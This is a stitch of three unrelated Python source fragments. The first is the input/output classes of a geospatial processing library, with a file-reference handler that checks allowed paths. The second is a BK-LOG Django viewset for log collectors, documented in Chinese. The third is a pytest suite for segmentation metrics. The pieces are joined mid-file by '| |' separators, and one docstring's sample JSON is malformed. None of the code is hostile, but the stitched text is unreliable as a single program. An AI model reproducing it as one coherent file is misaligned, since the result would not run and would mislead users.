self.crs = self.crss[0]
self.dimensions = dimensions
@property
def ll(self):
data = getattr(self, 'data', None)
if data:
return data[:2]
return []
@property
def ur(self):
data = getattr(self, 'data', None)
if data:
return data[2:]
return []
class LiteralInput(BasicIO, BasicLiteral, SimpleHandler):
"""LiteralInput input abstract class
"""
def __init__(self, identifier, title=None, abstract=None, keywords=None,
data_type="integer", workdir=None, allowed_values=None,
uoms=None, mode=MODE.NONE,
min_occurs=1, max_occurs=1, metadata=[],
default=None, default_type=SOURCE_TYPE.DATA):
BasicIO.__init__(self, identifier, title, abstract, keywords,
min_occurs, max_occurs, metadata)
BasicLiteral.__init__(self, data_type, uoms)
SimpleHandler.__init__(self, workdir, data_type, mode=mode)
if default_type != SOURCE_TYPE.DATA:
raise InvalidParameterValue("Source types other than data are not supported.")
self.any_value = False
self.values_reference = None
self.allowed_values = []
if allowed_values:
if not isinstance(allowed_values, (tuple, list)):
allowed_values = [allowed_values]
self.any_value = any(is_anyvalue(a) for a in allowed_values)
for value in allowed_values:
if is_values_reference(value):
self.values_reference = value
break
self.allowed_values = make_allowedvalues(allowed_values)
self._default = default
self._default_type = default_type
if default is not None:
self.data = default
@property
def validator(self):
"""Get validator for any value as well as allowed_values
:rtype: function
"""
if self.any_value:
return validate_anyvalue
elif self.values_reference:
return validate_values_reference
elif self.allowed_values:
return validate_allowed_values
else:
return validate_value
class LiteralOutput(BasicIO, BasicLiteral, SimpleHandler):
"""Basic LiteralOutput class
"""
def __init__(self, identifier, title=None, abstract=None, keywords=None,
data_type=None, workdir=None, uoms=None, validate=None,
mode=MODE.NONE):
BasicIO.__init__(self, identifier, title, abstract, keywords)
BasicLiteral.__init__(self, data_type, uoms)
SimpleHandler.__init__(self, workdir=None, data_type=data_type,
mode=mode)
self._storage = None
@property
def storage(self):
return self._storage
@storage.setter
def storage(self, storage):
self._storage = storage
@property
def validator(self):
"""Get validator for any value as well as allowed_values
"""
return validate_anyvalue
class BBoxInput(BasicIO, BasicBoundingBox, DataHandler):
"""Basic Bounding box input abstract class
"""
def __init__(self, identifier, title=None, abstract=None, keywords=[], crss=None,
dimensions=None, workdir=None,
mode=MODE.SIMPLE,
min_occurs=1, max_occurs=1, metadata=[],
default=None, default_type=SOURCE_TYPE.DATA):
BasicIO.__init__(self, identifier, title, abstract, keywords,
min_occurs, max_occurs, metadata)
BasicBoundingBox.__init__(self, crss, dimensions)
DataHandler.__init__(self, workdir=workdir, mode=mode)
if default_type != SOURCE_TYPE.DATA:
raise InvalidParameterValue("Source types other than data are not supported.")
self._default = default
self._default_type = default_type
self._set_default_value(default, default_type)
class BBoxOutput(BasicIO, BasicBoundingBox, DataHandler):
"""Basic BoundingBox output class
"""
def __init__(self, identifier, title=None, abstract=None, keywords=None, crss=None,
dimensions=None, workdir=None, mode=MODE.NONE):
BasicIO.__init__(self, identifier, title, abstract, keywords)
BasicBoundingBox.__init__(self, crss, dimensions)
DataHandler.__init__(self, workdir=workdir, mode=mode)
self._storage = None
@property
def storage(self):
return self._storage
@storage.setter
def storage(self, storage):
self._storage = storage
class ComplexInput(BasicIO, BasicComplex, IOHandler):
"""Complex input abstract class
>>> ci = ComplexInput()
>>> ci.validator = 1
>>> ci.validator
1
"""
def __init__(self, identifier, title=None, abstract=None, keywords=None,
workdir=None, data_format=None, supported_formats=None,
mode=MODE.NONE,
min_occurs=1, max_occurs=1, metadata=[],
default=None, default_type=SOURCE_TYPE.DATA):
BasicIO.__init__(self, identifier, title, abstract, keywords,
min_occurs, max_occurs, metadata)
IOHandler.__init__(self, workdir=workdir, mode=mode)
BasicComplex.__init__(self, data_format, supported_formats)
self._default = default
self._default_type = default_type
def file_handler(self, inpt):
"""<wps:Reference /> handler.
Used when href is a file url."""
extend_instance(self, FileHandler)
# check if file url is allowed
self._validate_file_input(href=inpt.get('href'))
# save the file reference input in workdir
tmp_file = self._build_file_name(href=inpt.get('href'))
try:
inpt_file = urlparse(inpt.get('href')).path
inpt_file = os.path.abspath(inpt_file)
os.symlink(inpt_file, tmp_file)
LOGGER.debug("Linked input file {} to {}.".format(inpt_file, tmp_file))
except Exception:
# TODO: handle os.symlink on windows
# raise NoApplicableCode("Could not link file reference: {}".format(e))
LOGGER.warn("Could not link file reference")
shutil.copy2(inpt_file, tmp_file)
return tmp_file
def url_handler(self, inpt):
# That could possibly go into the data property...
if inpt.get('method') == 'POST':
if 'body' in inpt:
self.post_data = inpt.get('body')
elif 'bodyreference' in inpt:
self.post_data = requests.get(url=inpt.get('bodyreference')).text
else:
raise AttributeError("Missing post data content.")
return inpt.get('href')
def process(self, inpt):
"""Subclass with the appropriate handler given the data input."""
href = inpt.get('href', None)
self.inpt = inpt
if href:
if urlparse(href).scheme == 'file':
self.file = self.file_handler(inpt)
else:
# No file download occurs here. The file content will
# only be retrieved when the file property is accessed.
self.url = self.url_handler(inpt)
else:
self.data = inpt.get('data')
@staticmethod
def _validate_file_input(href):
href = href or ''
parsed_url = urlparse(href)
if parsed_url.scheme != 'file':
raise FileURLNotSupported('Invalid URL scheme')
file_path = parsed_url.path
if not file_path:
raise FileURLNotSupported('Invalid URL path')
file_path = os.path.abspath(file_path)
# build allowed paths list
inputpaths = config.get_config_value('server', 'allowedinputpaths')
allowed_paths = [os.path.abspath(p.strip()) for p in inputpaths.split(':') if p.strip()]
for allowed_path in allowed_paths:
if file_path.startswith(allowed_path):
LOGGER.debug("Accepted file url as input.")
return
raise FileURLNotSupported()
class ComplexOutput(BasicIO, BasicComplex, IOHandler):
"""Complex output abstract class
>>> # temporary configuration
>>> import | |
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making BK-LOG 蓝鲸日志平台 available.
Copyright (C) 2021 THL A29 Limited, a Tencent company. All rights reserved.
BK-LOG 蓝鲸日志平台 is licensed under the MIT License.
License for BK-LOG 蓝鲸日志平台:
--------------------------------------------------------------------
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial
portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT
LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
from django.conf import settings
from django.utils.translation import ugettext_lazy as _
from rest_framework import serializers
from django.db.models import Q
from rest_framework.response import Response
from apps.exceptions import ValidationError
from apps.log_databus.constants import EtlConfig
from apps.log_search.constants import HAVE_DATA_ID, BKDATA_OPEN, NOT_CUSTOM, CollectorScenarioEnum
from apps.log_search.permission import Permission
from apps.utils.drf import detail_route, list_route
from apps.generic import ModelViewSet
from apps.iam import ActionEnum, ResourceEnum
from apps.iam.handlers.drf import (
InstanceActionPermission,
ViewBusinessPermission,
BusinessActionPermission,
insert_permission_field,
)
from apps.log_databus.handlers.collector import CollectorHandler
from apps.log_databus.handlers.etl import EtlHandler
from apps.log_databus.handlers.link import DataLinkHandler
from apps.log_databus.models import CollectorConfig
from apps.log_databus.serializers import (
RunSubscriptionSerializer,
BatchSubscriptionStatusSerializer,
TaskStatusSerializer,
TaskDetailSerializer,
CollectorListSerializer,
RetrySerializer,
CollectorEtlSerializer,
CollectorEtlStorageSerializer,
CollectorCreateSerializer,
CollectorUpdateSerializer,
CollectorEtlTimeSerializer,
CollectorDataLinkListSerializer,
CollectorRegexDebugSerializer,
ListCollectorsByHostSerializer,
CleanStashSerializer,
ListCollectorSerlalizer,
CustomCreateSerializer,
CustomUpateSerializer,
)
from apps.utils.function import ignored
class CollectorViewSet(ModelViewSet):
"""
采集项
"""
lookup_field = "collector_config_id"
filter_fields_exclude = ["collector_config_overlay"]
model = CollectorConfig
search_fields = ("collector_config_name", "table_id", "bk_biz_id")
ordering_fields = ("updated_at", "updated_by")
def get_permissions(self):
with ignored(Exception, log_exception=True):
auth_info = Permission.get_auth_info(self.request)
# ESQUERY白名单不需要鉴权
if auth_info["bk_app_code"] in settings.ESQUERY_WHITE_LIST:
return []
if self.action in ["list_scenarios", "batch_subscription_status"]:
return []
if self.action in ["create", "only_create", "custom_create"]:
return [BusinessActionPermission([ActionEnum.CREATE_COLLECTION])]
if self.action in [
"indices_info",
"retrieve",
"task_status",
"task_detail",
"subscription_status",
"get_data_link_list",
]:
return [InstanceActionPermission([ActionEnum.VIEW_COLLECTION], ResourceEnum.COLLECTION)]
if self.action in [
"update",
"only_update",
"destroy",
"retry",
"tail",
"start",
"stop",
"etl_preview",
"etl_time",
"update_or_create_clean_config",
"custom_update",
]:
return [InstanceActionPermission([ActionEnum.MANAGE_COLLECTION], ResourceEnum.COLLECTION)]
return [ViewBusinessPermission()]
def get_queryset(self):
qs = self.model.objects
if self.request.query_params.get(HAVE_DATA_ID):
qs = qs.filter(bk_data_id__isnull=False)
if self.request.query_params.get(BKDATA_OPEN) and settings.FEATURE_TOGGLE["scenario_bkdata"] == "off":
qs = qs.filter(Q(etl_config=EtlConfig.BK_LOG_TEXT) | Q(etl_config__isnull=True))
if self.request.query_params.get(NOT_CUSTOM):
qs = qs.exclude(collector_scenario_id=CollectorScenarioEnum.CUSTOM.value)
return qs.all()
def get_serializer_class(self, *args, **kwargs):
action_serializer_map = {
"subscription_run": RunSubscriptionSerializer,
"batch_subscription_status": BatchSubscriptionStatusSerializer,
"task_status": TaskStatusSerializer,
"task_detail": TaskDetailSerializer,
"list": CollectorListSerializer,
"retry": RetrySerializer,
"list_collectors": CollectorListSerializer,
}
return action_serializer_map.get(self.action, serializers.Serializer)
@list_route(methods=["GET"], url_path="scenarios")
def list_scenarios(self, request, *args, **kwargs):
"""
@api {get} /databus/collector/scenarios/ 01_采集类型
@apiName list_collector_scenarios
@apiGroup 10_Collector
@apiDescription 显示采集类型及支持的个定义配置
@apiSuccess {Int} collector_scenario_id 采集类型ID
@apiSuccess {String} collector_scenario_name 采集类型名称
@apiSuccess {Bool} is_active 是否可用(如果不可用,则在前端只可以显示,但不能选择)
@apiSuccess {Json} config 采集类型配置(与创建采集项的params对应)
@apiSuccess {String} config.field_type 字段类型
@apiSuccess {String} config.field_name 字段名称
@apiSuccess {String} config.field_alias 别名
@apiSuccess {Bool} config.required 是否必填
@apiSuccess {Json} config.option 字段特殊配置
@apiSuccess {List} config.conditions.option.choices 支持的选项
@apiSuccessExample {json} 成功返回:
{
"message": "",
"code": 0,
"data": [
{
"collector_scenario_id": "row",
"collector_scenario_name": "行日志",
"is_active": true,
"config": {
"paths": {
"field_type": "list",
"field_name": "paths",
"field_alias": "日志路径",
"required": true,
"option": {}
},
"conditions": {
"field_type": "dict",
"field_name": "conditions",
"field_alias": "过滤方式",
"required": false,
"option": {
"choices": ["match", "separator"]
}
}
}
}
],
"result": true
}
"""
scenarios = [
{
"collector_scenario_id": "row",
"collector_scenario_name": _("行日志"),
"is_active": True,
"config": {
"paths": {
"field_type": "list",
"field_name": "paths",
"field_alias": _("日志路径"),
"required": True,
"option": {},
},
"conditions": {
"field_type": "dict",
"field_name": "conditions",
"field_alias": _("过滤方式"),
"required": False,
"option": {"choices": ["match", "separator"]},
},
},
},
{
"collector_scenario_id": "section",
"collector_scenario_name": _("段日志"),
"is_active": False,
"config": {
"paths": {
"field_type": "list",
"field_name": "paths",
"field_alias": _("日志路径"),
"required": True,
"option": {},
},
"conditions": {
"field_type": "dict",
"field_name": "conditions",
"field_alias": _("过滤方式"),
"required": False,
"option": {"choices": ["match"]},
},
},
},
]
return Response(scenarios)
@insert_permission_field(
id_field=lambda d: d["collector_config_id"],
data_field=lambda d: d["list"],
actions=[ActionEnum.VIEW_COLLECTION, ActionEnum.MANAGE_COLLECTION],
resource_meta=ResourceEnum.COLLECTION,
)
@insert_permission_field(
id_field=lambda d: d["index_set_id"],
data_field=lambda d: d["list"],
actions=[ActionEnum.SEARCH_LOG],
resource_meta=ResourceEnum.INDICES,
)
def list(self, request, *args, **kwargs):
"""
@api {get} /databus/collectors/?page=$page&pagesize=$pagesize&keyword=$keyword&bk_biz_id=$bk_biz_id 11_采集项-列表
@apiName list_collector
@apiGroup 10_Collector
@apiDescription 采集项列表,运行状态通过异步接口获取,
@apiParam {Int} bk_biz_id 业务ID
@apiParam {Int} page 页数
@apiParam {Int} pagesize 每页数量
@apiParam {String} keyword 搜索关键字
@apiSuccess {Int} count 总数
@apiSuccess {Int} total_page 总共页数
@apiSuccess {Array} results 返回结果
@apiSuccess {Int} results.collector_config_id 采集项ID
@apiSuccess {Int} results.collector_config_name 采集项名称
@apiSuccess {String} results.collector_scenario_id 类型id
@apiSuccess {String} results.collector_scenario_name 类型名称
@apiSuccess {String} results.category_id 分类ID
@apiSuccess {String} results.category_name 分类名称
@apiSuccess {Bool} results.is_active 是否可用
@apiSuccess {String} results.description 描述
@apiSuccess {String} results.created_by 创建人
@apiSuccess {String} results.created_at 创建时间
@apiSuccessExample {json} 成功返回:
{
"message": "",
"code": 0,
"data": {
"count": 10,
"total_page": 1,
"results": [{
"collector_config_id": 1,
"collector_config_name": "采集项名称",
"collector_scenario_id": "line",
"collector_scenario_name": "行日志",
"category_id": "host_os",
"category_name": "主机-操作系统",
"is_active": true,
"created_by": "小星星"
"created_at": "2019-06-12 12:00:00"
}]
},
"result": true
}
"""
# 强制前端必须传分页参数
if not request.GET.get("page") or not request.GET.get("pagesize"):
raise ValidationError(_("分页参数不能为空"))
response = super().list(request, *args, **kwargs)
response.data["list"] = CollectorHandler.add_cluster_info(response.data["list"])
return response
@insert_permission_field(
id_field=lambda d: d["collector_config_id"],
data_field=lambda d: d["list"],
actions=[ActionEnum.MANAGE_COLLECTION],
resource_meta=ResourceEnum.COLLECTION,
)
@list_route(methods=["GET"])
def list_collector(self, request):
"""
@api {get} /databus/collectors/list_collector?bk_biz_id=$bk_biz_id 采集项-下拉列表
@apiName list_collector_switch
@apiGroup 10_Collector
@apiDescription 采集项下拉列表
@apiParam {Int} bk_biz_id 业务ID
@apiSuccessExample {json} 成功返回:
{
"message": "",
"code": 0,
"data": {
"collector_config_id": 1,
"collector_config_name": "采集项名称",
},
"result": true
}
"""
data = self.params_valid(ListCollectorSerlalizer)
return Response(CollectorHandler().list_collector(data["bk_biz_id"]))
def retrieve(self, request, *args, collector_config_id=None, **kwargs):
"""
@api {get} /databus/collectors/$collector_config_id/ 12_采集项-详情
@apiName retrieve_collector
@apiGroup 10_Collector
@apiParam {Int} collector_config_id 采集项ID
@apiSuccess {String} collector_scenario_id 日志类型 可选字段`row, section, win_event`
@apiSuccess {String} collector_scenario_name 日志类型名称
@apiSuccess {String} collector_config_name 采集项名称
@apiSuccess {String} category_id 数据分类
@apiSuccess {String} category_name 数据分类显示名称
@apiSuccess {Array[Dict]} target 已选目标
@apiSuccess {Array(json)} target_nodes 采集目标
@apiSuccess {Int} target_nodes.id 服务实例id
@apiSuccess {Int} target_nodes.bk_inst_id 节点实例id
@apiSuccess {String} target_nodes.bk_obj_id 节点对象id
@apiSuccess {String} target_nodes.ip 主机实例ip
@apiSuccess {Int} target_nodes.bk_cloud_id 蓝鲸云主机id
@apiSuccess {Int} target_nodes.bk_supplier_id 支撑id
@apiSuccess {String} data_encoding 日志字符集
@apiSuccess {String} bk_data_id META-采集项ID
@apiSuccess {String} bk_data_name META-采集项名称
@apiSuccess {String} description 备注说明
@apiSuccess {json} params 日志信息
@apiSuccess {Array} params.paths 日志路径
@apiSuccess {json} params.conditions 过滤方式
@apiSuccess {String} params.conditions.type 过滤方式类型 可选字段 `match, separator`
@apiSuccess {String} params.conditions.match_type 过滤方式 可选字段 `include, exclude`
@apiSuccess {String} params.conditions.match_content 过滤内容
@apiSuccess {String} params.conditions.separator 分隔符
@apiSuccess {Json} params.conditions.separator_filters 分隔符过滤条件
@apiSuccess {String} etl_config 字段提取方式
@apiSuccess {Object} etl_params 字段提取参数
@apiSuccess {String} etl_params.separator 分隔符
@apiSuccess {String} etl_params.separator_regexp 正则-字段提取正则
@apiSuccess {Bool} etl_params.retain_original_text 是否保留原文
@apiSuccess {list} fields 字段列表
@apiSuccess {Int} fields.field_index 字段顺序(分隔符显示)
@apiSuccess {String} fields.field_name 字段名称
@apiSuccess {String} [fields.alias_name] 别名
@apiSuccess {String} fields.field_type 字段类型
@apiSuccess {String} fields.description 字段说明
@apiSuccess {Bool} fields.is_analyzed 是否分词
@apiSuccess {Bool} fields.is_dimension 是否维度
@apiSuccess {Bool} fields.is_time 是否时间字段
@apiSuccess {Bool} fields.is_built_in 是否标准字段
@apiSuccess {Bool} fields.is_delete 是否删除
@apiSuccess {Json} [fields.option] 字段配置
@apiSuccess {Int} fields.option.time_zone 时间
@apiSuccess {String} fields.option.time_format 时间格式
@apiSuccess {Int} storage_cluster_id 存储集群ID
@apiSuccess {String} storage_cluster_name 存储集群名称
@apiSuccess {Int} retention 过期天数
@apiSuccess {String} table_id_prefix 存储索引名前辍
@apiSuccess {String} table_id 存储索引名
@apiSuccess {String} created_at 创建时间
@apiSuccess {String} created_by 创建人
@apiSuccess {String} updated_at 更新时间
@apiSuccess {String} updated_by 更新人
@apiSuccess {String} itsm_ticket_status 采集ITSM状态
@apiSuccess {String} itsm_ticket_status_display 采集ITSM状态显示名称
@apiSuccess {String} ticket_url 采集ITSM流程地址
@apiSuccess {String} index_split_rule 分裂规则
@apiSuccessExample {json} 成功返回:
{
"collector_scenario_id": "row",
"collector_scenario_name": "行日志",
"collector_config_name": "我叫access的",
"category_id": "os",
"category_name": "主机-操作系统",
"target_nodes": [
{
"id": 12
},
{
"bk_inst_id": 33,
"bk_obj_id": "module",
},
{
"ip": "127.0.0.1",
"bk_cloud_id": 0,
"bk_supplier_id": 0,
}
],
"data_encoding": "utf-8",
"bk_data_name": "存储索引名",
"description": "这是一个描述",
"params": {
"paths": ["/tmp/health_check.log"],
"conditions": {
"type": "match",
"match_type": "include",
"match_content": "delete",
"separator": "|",
"separator_filters": [
{
"fieldindex": 2,
"word": "32",
"op": "="
}
]
}
},
"etl_config": "bk_log_text",
"etl_params": {
"separator_regexp": "[a-z][0-9]",
"separator": "|",
"retain_original_text": true
},
"fields": [
{
"field_index": 1,
"field_name": "user",
"alias_name": "",
"field_type": "string",
"description": "字段描述",
"is_analyzed": true,
"is_dimension": false,
"is_time": false,
"is_built_in": false,
"is_delete": false,
},
{
"field_index": 2,
"field_name": "",
"alias_name": "",
"field_type": "string",
"description": "",
"is_analyzed": true,
"is_dimension": false,
"is_time": false,
"is_built_in": false,
"is_delete": true,
},
{
"field_index": 3,
"field_name": "report_time",
"alias_name": "",
"field_type": "string",
"description": "字段描述",
"is_analyzed": false,
"is_dimension": true,
"is_time": true,
"is_built_in": false,
"is_delete": false,
"option": {
"time_zone": 8,
"time_format": "yyyy-MM-dd HH:mm:ss"
}
],
"table_id_prefix": "2_bklog_",
"table_id": "search",
"storage_cluster_id": 3,
"storage_cluster_name": "存储集群名称",
"retention": 1,
"itsm_ticket_status": "success_apply",
"itsm_ticket_status_display": "采集接入完成",
"ticket_url": "",
"index_split_rule": ""
}
"""
return Response(CollectorHandler(collector_config_id=collector_config_id).retrieve())
def create(self, request, *args, **kwargs):
"""
@api {post} /databus/collectors/ 13_采集项-创建
@apiName create_collector
@apiDescription 创建采集项
| |
<gh_stars>100-1000
"""Test SegmentationMetricsByPixels and SegmentationMetricsByInstances classes.
Also act as tests for ClassificationMetrics, since it's identical to
SegmentationMetricsByPixels.
Structurally, file consists of four classes, which respectively check:
- basic assembly process (shapes compatibility, confusion matrix corectness);
- evaluated result shape of SegmemtationMetricsByPixels for all metrics;
- similarly, evaluated result contents;
- so-called "subsampling" functions of SegmentationMetricsByInstances.
Test data is pre-defined, it's shape and contents were chosen for reasons
of balance between visual simplicity and test coverage diversity.
"""
# pylint: disable=import-error, no-name-in-module, invalid-name, protected-access
import numpy as np
import pytest
from batchflow.models.metrics import SegmentationMetricsByPixels, SegmentationMetricsByInstances
# Accuracy is not included because it can't process 'multiclass' parameter
# and therefore is being tested individually.
METRICS_LIST = ['tpr', 'fpr', 'fnr', 'tnr', 'prv', 'ppv', 'fdr', 'for', 'npv', 'plr', 'nlr', 'dor', 'f1s', 'jac']
BATCH_SIZE = 4
IMAGE_SIZE = 2
NUM_CLASSES = 3
# Set targets.
TARGETS = np.array([[[0, 1],
[2, 2]],
[[0, 0],
[1, 1]],
[[0, 1],
[0, 2]],
[[0, 0],
[1, 1]]
])
# Set predictions as 'labels'.
LABELS = np.array([[[0, 1],
[1, 0]],
[[2, 0],
[1, 1]],
[[0, 1],
[2, 1]],
[[0, 0],
[0, 1]]
])
# Onehots are basically like probas, just with all 0 and a single 1.
PROBA = np.eye(NUM_CLASSES)[LABELS]
# Logit function gives ±infs on degenerate case of 0s and 1s but works fine for sigmoid function.
LOGITS = np.where(PROBA > 0.5, np.inf, -np.inf)
"""First param stands for predictions variable, second — for predictions type, third — for axis with class info.
Transposed predictions correspond to 'channels_first' data format."""
PREDICTIONS = [(LABELS, 'labels', None),
(PROBA, 'proba', 3),
(LOGITS, 'logits', 3),
(np.transpose(PROBA, (3, 0, 1, 2)), 'proba', 0),
(np.transpose(LOGITS, (3, 0, 1, 2)), 'logits', 0)]
BAD_PREDICTIONS = [(LABELS[0], 'labels', None), # predictions ndim is less then targets' for labels
(PROBA, 'proba', None), # axis is None for multiclass proba
(LOGITS, 'logits', None)] # axis is None for multiclass logits
class TestAssembly:
"""Check metrics creation process."""
@pytest.mark.parametrize('SegmentationMetrics', [SegmentationMetricsByPixels, SegmentationMetricsByInstances])
@pytest.mark.parametrize('predictions, fmt, axis', BAD_PREDICTIONS)
def test_incompatibility_processing(self, SegmentationMetrics, predictions, fmt, axis):
"""Create metrics class with inconsistent targets and predictions
(different ndim, no axis when it's required), expecting ValueError.
Parameters
----------
SegmentationMetrics: SegmentationsMetricsByPixels or
SegmentationsMetricsByInstances
Metrics class
predictions : np.array
Variable name containing predictions' array of desired format
fmt : string
Denotes predictions format
axis : None or int
A class axis
"""
with pytest.raises(ValueError):
SegmentationMetrics(TARGETS, predictions, fmt, NUM_CLASSES, axis)
params = [(SegmentationMetricsByPixels, np.array([[[1, 0, 1],
[0, 1, 1],
[0, 0, 0]],
[[1, 0, 0],
[0, 2, 0],
[1, 0, 0]],
[[1, 0, 0],
[0, 1, 1],
[1, 0, 0]],
[[2, 1, 0],
[0, 1, 0],
[0, 0, 0]]]),
),
(SegmentationMetricsByInstances, np.array([[[[0, 0],
[1, 1]],
[[0, 1],
[0, 0]]],
[[[0, 0],
[0, 1]],
[[0, 0],
[1, 0]]],
[[[0, 0],
[0, 1]],
[[0, 1],
[1, 0]]],
[[[0, 0],
[0, 1]],
[[0, 0],
[0, 0]]],
]))]
@pytest.mark.parametrize('SegmentationMetrics, exp_matrix', params)
@pytest.mark.parametrize('predictions, fmt, axis', PREDICTIONS)
def test_confusion_matrix(self, SegmentationMetrics, exp_matrix, predictions, fmt, axis):
"""Compare contents of actual confusion matrix with expected ones
for metrics class assembled with given params.
Parameters
----------
SegmentationMetrics: SegmentationsMetricsByPixels or
SegmentationsMetricsByInstances
Metrics class
exp_matrix: np.array
Expected confusion matrix
predictions : np.array
Variable name containing predictions' array of desired format
fmt : string
Denotes predictions format
axis : None or int
A class axis
"""
metric = SegmentationMetrics(TARGETS, predictions, fmt, NUM_CLASSES, axis)
res_matrix = metric._confusion_matrix
assert np.array_equal(res_matrix, exp_matrix)
class TestShape:
"""Check the shape of evaluated metrics return value for various parameters.
There is a following pattern in both tests:
0. Each function is preceded by data for it's parametrization.
1. Parametrizing decorators are applied.
2. Instance of SegmentationMetricsByPixels is being created.
3. Metric is being evaluated with given parameters.
4. It's result's shape is being compared with expected one.
"""
# First param stands for batch aggregation, second — for multiclass one, third represents expected output shape.
params = [(None, None, lambda l: (BATCH_SIZE, NUM_CLASSES - l)),
(None, 'micro', (BATCH_SIZE,)),
(None, 'macro', (BATCH_SIZE,)),
('mean', None, lambda l: (NUM_CLASSES - l,)),
('mean', 'micro', None),
('mean', 'macro', None)]
@pytest.mark.parametrize('metric_name', METRICS_LIST)
@pytest.mark.parametrize('predictions, fmt, axis', PREDICTIONS)
@pytest.mark.parametrize('batch_agg, multi_agg, exp_shape', params)
@pytest.mark.parametrize('skip_bg', [False, True])
def test_shape(self, metric_name, predictions, fmt, axis, batch_agg, multi_agg, exp_shape, skip_bg):
"""Compare expected return value shape with actual return value shape of
metric evaluation with given params for all metrics from METRICS_LIST.
Parameters
----------
predictions : np.array
Variable name containing predictions' array of desired format
fmt : string
Denotes predictions format
axis : None or int
A class axis
batch_agg : string
Cross-batch aggregation type
multi_agg : string
Multiclass agregation type
exp_shape : None or tuple
Expected return value shape
skip_bg : False or True
If background class should be excluded from metrics evaluation
"""
if callable(exp_shape):
exp_shape = exp_shape(skip_bg)
metric = SegmentationMetricsByPixels(targets=TARGETS, predictions=predictions, fmt=fmt,
num_classes=NUM_CLASSES, axis=axis, skip_bg=skip_bg)
res = metric.evaluate(metrics=metric_name, agg=batch_agg, multiclass=multi_agg)
res_shape = res.shape if isinstance(res, np.ndarray) else None
assert res_shape == exp_shape
@pytest.mark.parametrize('predictions, fmt, axis', PREDICTIONS)
@pytest.mark.parametrize('batch_agg, exp_shape', [(None, (BATCH_SIZE,)), ('mean', None)])
def test_shape_accuracy(self, predictions, fmt, axis, batch_agg, exp_shape):
"""Compare expected return value shape with actual return value shape of
accuracy metric evaluation with given params.
Parameters
----------
predictions : np.array
Variable name containing predictions' array of desired format
fmt : string
Denotes predictions format
axis : None or int
A class axis
batch_agg : string
Cross-batch aggregation type
exp_shape : None or tuple
Expected return value shape
"""
metric = SegmentationMetricsByPixels(TARGETS, predictions, fmt, NUM_CLASSES, axis)
res = metric.evaluate(metrics='accuracy', agg=batch_agg)
res_shape = res.shape if isinstance(res, np.ndarray) else None
assert res_shape == exp_shape
class TestResult:
"""Check evaluated metrics return value for various parameters.
There is a following pattern in both tests:
0. Each function is preceded by data for it's parametrization.
1. Parametrizing decorators are applied.
2. Instance of SegmentationMetricsByPixels is being created.
3. Metric is being evaluated with given parameters.
4. It's result is being compared with expected one.
"""
# First param stands for batch aggregation type, second — for multiclass one,
# third represents manually pre-calculated expected output contents for each type of metrics.
params = [(None, None, {'tpr' : np.array([1.00, 1.00, 0.00, 0.50, 1.00, 1.00, 0.50, 1.00, 0.00, 1.00, 0.50, 1.00]),
'fpr' : np.array([0.33, 0.33, 0.00, 0.00, 0.00, 0.25, 0.00, 0.33, 0.33, 0.50, 0.00, 0.00]),
'tnr' : np.array([0.66, 0.66, 1.00, 1.00, 1.00, 0.75, 1.00, 0.66, 0.66, 0.50, 1.00, 1.00]),
'fnr' : np.array([0.00, 0.00, 1.00, 0.50, 0.00, 0.00, 0.50, 0.00, 1.00, 0.00, 0.50, 0.00]),
'prv' : np.array([0.25, 0.25, 0.50, 0.50, 0.50, 0.00, 0.50, 0.25, 0.25, 0.50, 0.50, 0.00]),
'ppv' : np.array([0.50, 0.50, 1.00, 1.00, 1.00, 0.00, 1.00, 0.50, 0.00, 0.66, 1.00, 1.00]),
'fdr' : np.array([0.50, 0.50, 0.00, 0.00, 0.00, 1.00, 0.00, 0.50, 1.00, 0.33, 0.00, 0.00]),
'for' : np.array([0.00, 0.00, 0.50, 0.33, 0.00, 0.00, 0.33, 0.00, 0.33, 0.00, 0.33, 0.00]),
'npv' : np.array([1.00, 1.00, 0.50, 0.66, 1.00, 1.00, 0.66, 1.00, 0.66, 1.00, 0.66, 1.00]),
'plr' : np.array([3.00, 3.00, 0.00, np.inf, np.inf, 4.00,
np.inf, 3.00, 0.00, 2.00, np.inf, np.inf]),
'nlr' : np.array([0.00, 0.00, 1.00, 0.50, 0.00, 0.00, 0.50, 0.00, 1.50, 0.00, 0.50, 0.00]),
'dor' : np.array([np.inf, np.inf, 0.00, np.inf, np.inf, np.inf,
np.inf, np.inf, 0, np.inf, np.inf, np.inf]),
'f1s' : np.array([0.66, 0.66, 0.00, 0.66, 1.00, 0.00,
0.66, 0.66, 0.00, 0.80, 0.66, np.inf]),
'jac' : np.array([0.50, 0.50, 0.00, 0.50, 1.00, 0.00,
0.50, 0.50, 0.00, 0.66, 0.50, np.inf])}),
(None, 'micro', {'tpr' : np.array([0.50, 0.75, 0.50, 0.75]),
'fpr' : np.array([0.25, 0.12, 0.25, 0.12]),
'tnr' : np.array([0.75, 0.87, 0.75, 0.88]),
'fnr' : np.array([0.50, 0.25, 0.50, 0.25]),
'prv' : np.array([0.33, 0.33, 0.33, 0.33]),
'ppv' : np.array([0.50, 0.75, 0.50, 0.75]),
'fdr' : np.array([0.50, 0.25, 0.50, 0.25]),
'for' : np.array([0.25, 0.12, 0.25, 0.12]),
'npv' : np.array([0.75, 0.87, 0.75, 0.88]),
'plr' : np.array([3.00, 10.00, 2.25, 5.00]),
'nlr' : np.array([0.42, 0.18, 0.64, 0.20]),
'dor' : np.array([6.00, np.inf, np.inf, np.inf]),
'f1s' : np.array([0.50, 0.75, 0.50, 0.75]),
'jac' : np.array([0.33, 0.60, 0.33, 0.60])}),
(None, 'macro', {'tpr' : np.array([0.66, 0.83, 0.5, 0.83]),
'fpr' : np.array([0.22, 0.08, 0.22, 0.16]),
